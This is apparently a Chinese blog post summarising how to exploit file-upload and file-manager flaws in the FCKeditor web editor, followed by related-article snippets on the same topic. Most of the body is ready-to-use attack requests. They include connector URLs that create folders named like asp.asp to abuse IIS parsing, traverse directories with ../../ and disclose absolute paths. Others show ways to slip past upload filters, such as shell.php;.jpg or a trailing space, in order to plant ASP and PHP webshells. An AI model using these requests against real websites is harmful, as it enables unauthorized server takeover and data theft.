FCK上传总结

最新推荐文章于 2024-04-10 14:06:16 发布
最新推荐文章于 2024-04-10 14:06:16 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 安全相关 文章标签: fckeditor 漏洞利用

适合asp站点
1、浏览查看文件
http://127.0.0.1/fckeditor/editor/filemanager/browser/default/browser.html?Connector=http://127.0.0.1/fckeditor/editor/filemanager/connectors/asp/connector.asp
2、创建asp.asp文件夹
http://127.0.0.1/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=/asp.asp&NewFolderName=Test Folder

http://127.0.0.1/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/asp.asp&NewFolderName=Test Folder
上传asp小马注意为txt格式得到文件名,文件名一般开头为日期
3、找到上传的小马,一般地址为
http://127.0.0.1/uploadfile/file/asp.asp/2007010112345678999.txt

4、上传asp大马

1、查看编辑器版本
/fckeditor/editor/dialog/fck_about.html
/fckeditor/_samples/default.html中“关于”
常用版本号:
2.6.5 Build 23959
2.6.4 Build 21629
2、爆绝对路径(浏览查看文件)
/fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/asp/connector.asp

/fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/aspx/connector.aspx

/fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/php/connector.php

/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
支持php的通杀,2.6.4和2.6.5测试未通过

/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

3、遍历目录
/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../

Version 2.4.1 测试通过
修改CurrentFolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
也可以直接浏览盘符:
JSP 版本:
fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/

4、jsp上传
/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector.jsp
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

5、Version < =2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。

Upload a new file:

6、 fckeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。试试上传1.asp;jpg
6.1:提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
6.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。

7、 突破建立文件夹
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684

/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
8、 fckeditor 中test 文件的上传地址
/fckeditor/editor/filemanager/browser/default/connectors/test.html
/fckeditor/editor/filemanager/upload/test.html
/fckeditor/editor/filemanager/connectors/test.html
/fckeditor/editor/filemanager/connectors/uploadtest.html

参考内容:
1、《fckeditor 漏洞汇总》http://blog.zahuibbs.com/?p=558
2、《对fckeditor的一些漏洞总结》 http://www.st999.cn/blog/?action=show&id=84
3、《fckeditor漏洞总结》 http://hi.baidu.com/0x残剑/blog/item/1b96a6cbe7b57a46b219a825.html
4、《新突破fckeditor漏洞》 http://gov.com.im/art_design/2011/0207/fck.html
5、《编辑器漏洞总结》 http://hi.baidu.com/???day/blog/item/b86013f61ecc3b5fd7887dc0.html

起个名字被占了
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
最新FCK上传插件 (jsp)
07-23
总结来说,这个“最新FCK上传插件 (jsp)”包含的是一套与FCKeditor集成的文件上传解决方案,涉及前端JavaScript编辑器与后端Java服务器的交互,以及文件上传的整个流程管理,为开发者提供了便捷的富文本编辑器增强...
【渗透测试】--- FCKeditor文本编辑器漏洞
热门推荐
qq_43168364的博客
12-25 1万+
一、FCKeditor编辑器漏洞 FCKeditor编辑器是一款强大的所见即所得文本编辑器,现在已经更名为:CKEditor fckeditor的常见敏感目录(FCK有时要小写) (1) 查看版本信息 /FCKeditor/editor/dialog/fck_about.html /FCKeditor/_whatsnew.html (2) 默认上传页面 /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/edito
fckeditor编辑器漏洞
D1stiny的博客
04-07 3279
查看fckeditor编辑器版本 /_whatsnew.html /editor/dialog/fck_about.html 查出版本信息之后就可以到网上搜相应的漏洞 version2.2 Apache+linux 环境下在上传文件后面加个.突破 version<=2.4.2 For php 该版本在处理PHP上传的地方没有对Media类型进行上传文件类型的控制,导致用户上传任意...
XSStrike工具的安装及使用(包括实战应用),网络安全开发新手入门教程
最新发布
2401_84185182的博客
04-10 362
实战测试发现一个登录页面 用户名输入什么都显示正确,怀疑此处有注入点。放到xsstrike跑因为是post请求所以用测试post请求的命令成功拿下,使用任意payload,开始验证这时候还要普及一个xss漏洞,因为这个网站刚好有!
FCkEditor编辑器漏洞(IIS 6.0)
玫瑰安全
05-18 1292
Fckeditor编辑器的漏洞几乎和ewebeditor编辑器漏洞一样严重. 与ewebeditor编辑器不通的是,Fckeditor编辑器的漏洞只存在于暴露编辑器的上传点和服务器IIS版本必须是iis6.0版本 (因为IIS6.0存在解析漏洞)   反之如果说服务器的IIS版本为6.0以上则无法利用。 一般情况下fckeditor编辑器的默认上传地址为: /e
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御
qq_50854662的博客
11-08 4731
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御
FCKeditor 2.4.3文件上传漏洞 ——合天网安实验室学习笔记
weixin_42582241的博客
02-22 2806
实验链接 FCKeditor是一款开放源码的文本编辑器,其2.4.3版本upload.php文件使用黑名单进行文件校验,通过实验学习如何绕过黑名单检测,上传恶意文件。 链接:http://www.hetianlab.com/expc.do?ce=374758bd-360d-44ac-8db5-a60ac5c25866 实验简介 实验所属系列: Web安全 实验对象: 本科/专科信息安全专业 相关课...
java fck例子
10-27
总结起来,Java FCK例子主要涵盖了如何在Java Web应用中集成FCKeditor,处理富文本编辑、文件上传和内容安全等方面的知识。实际开发中,还需要考虑用户体验、性能优化以及与其他功能模块的协同工作。理解并掌握这些...
FCKEDITOR JSP 上传图片
06-17
总结起来,FCKeditor结合JSP实现图片上传功能,主要涉及客户端编辑器的配置、服务器端处理程序的编写以及两者之间的通信。在实际开发中,还需要关注用户体验、安全性以及文件管理等多个方面,以确保功能的完整性和...
FCK使用教材
11-09
**FCK编辑器详解** FCKeditor是一款曾经广泛使用的开源HTML文本编辑器,它使得在网页上创建富文本内容变得更加简单。本教材将全面讲解FCKeditor的安装、配置、使用方法,以及针对中文乱码问题的解决方案。 **一、...
fck嵌入JAVA
01-31
总结,Java应用中嵌入FCKeditor涉及前端编辑器的引入和配置,以及后端接收和处理富文本内容。在实际开发中,还需要关注安全性、性能优化和用户体验等方面。理解这些知识点有助于构建高效、安全的Web编辑器应用。
关于fck的安全性问题.
11-04
FCK编辑器的如果后台没登录/fckeditor/editor/filemanager/browser/default/browser.html 页面也能上传东西的 在/FCKEditor/editor/filemanager/connectors/aspx/config.aspx 页面里改下登录限制 FCK 编辑器的注意了~看下 /FCKEditor/editor/filemanager/connectors/test.html 有无此文件~~这个文件相当危险uploadtest.html 也是
FCKeditor编辑器漏洞
arissa666的博客
10-18 297
FCKeditor在网页上属于开发源代码的文字编辑器,FCK是作者的名字。
FCKeditor编辑器突破上传拿shell
1匹黑马
04-08 988
昨天遇到了一个FCK,我百度了下,发现网上利用最多的,就是用 /fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=/1.asp&NewFolderName=Test%20Folder 这个链接来建立名为1.asp的...
编辑器漏洞(配合文件上传等)
guanjian_ci的博客
03-23 5807
编辑器分类:ewebeditor、kindeditor、ckeditorfckeditor、Cute Editor、ueditor、southidceditor等等 一、ewebeditor编辑器(数据库路径、文件上传、目录遍历、SQL注入等) (1)漏洞1 Admin_Login.asp 登录页面 Admin_Default.asp 管理首页 Admin_Style.asp 样式页面 Admin_UploadFile.asp 上...
如何配置FCK编辑器图片上传
huangjianxiang1875的专栏
07-26 878
在php config文件中设置 打开editor/filemanager/connectors/php/config.php找到 $Config['Enabled'] = true ; $Config['UserFilesPath'] = 'http://localhost/file' ;//上传后服务器上的路径 $Config['UserFilesAbsolutePath'] =
asp fckeditor简单配置和上传设置,上传文件改名
lzqial1987的专栏
04-30 2584
程序瘦身需要留下的有根目录下:editor目录 、fckconfig.js、 fckeditor.asp fckeditor.js fckstyles.xml fcktemplates.xml 这几个保留,其余的全部去除;子目录下:editor/filemanager/connectors目录中 把asp目录留下(上传用什么方法就留下什么),其余的方法目录[php、aspx 等待 目录
FCKeditor 2.5 使用方法 配置ASP上传功能
judge9999的专栏
02-25 1008
FCKeditor 刚刚发布了FCKeditor 最新版本 2.5 ,拿到手以后就开始研究了一下,发现很多功能还不能使用,需要设置一下。                现在和大家一起分享一下!下载解压后,内部文件如图所示: 里面有FCKEditor编辑器程序包,在FCKEditor最新版本:FCKEditor 2.5版中提供了官方范例,在上图所示的_Samples,大家可以看看
Fckeditor漏洞利用全面解析
weixin_34413802的博客
06-27 518
第一步:查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————— 第二步. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 ————————————————————————————— 第三步.Version <=2.4.2 For php ...
解释一下FCK:editor标签
03-30
FCKeditor是一款基于Web的富文本编辑器,它允许用户在网页中创建和编辑内容,具有类似于Microsoft Word的界面和功能。FCKeditor标签是用于在网页中引入FCKeditor编辑器的HTML标签,它可以在页面中嵌入一个编辑器实例...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值